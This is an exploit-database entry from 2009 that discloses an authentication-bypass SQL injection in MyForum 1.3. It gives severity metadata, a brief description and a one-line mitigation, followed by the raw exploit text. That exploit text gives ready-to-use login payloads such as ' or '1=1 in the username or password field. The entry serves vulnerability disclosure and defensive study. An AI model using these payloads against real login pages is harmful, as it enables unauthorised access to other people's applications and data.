header-logo
Suggest Exploit
vendor:
MyForum
by:
ThE g0bL!N
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MyForum
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE: N/A
CPE: a:easy-script:myforum:1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: localhost
2009

MyForum 1.3 (Auth Bypass) Remote SQL Injection

MyForum 1.3 is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted username and password to bypass authentication and gain access to the application.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in an application.
Source

Exploit-DB raw data:

 ################################################################################################
[+] MyForum 1.3 (Auth Bypass) Remote SQL Injection
[+] Discovered By : ThE g0bL!N      
[+] Greetz : All my freind      
[+] Note: Tested On localhost :)
[+] http://www.easy-script.com/scripts-dl/myforumv1.3.zip
################################################################################################
Exploit:
-------
Username: [real_admin_name]
Password:' or '1=1
Or
Username: [real_admin_name]' or '1=1
Password:ThE g0bL!N
###############################################################################################

# milw0rm.com [2009-05-26]

Navigation

Suggest Exploit

Services By CQR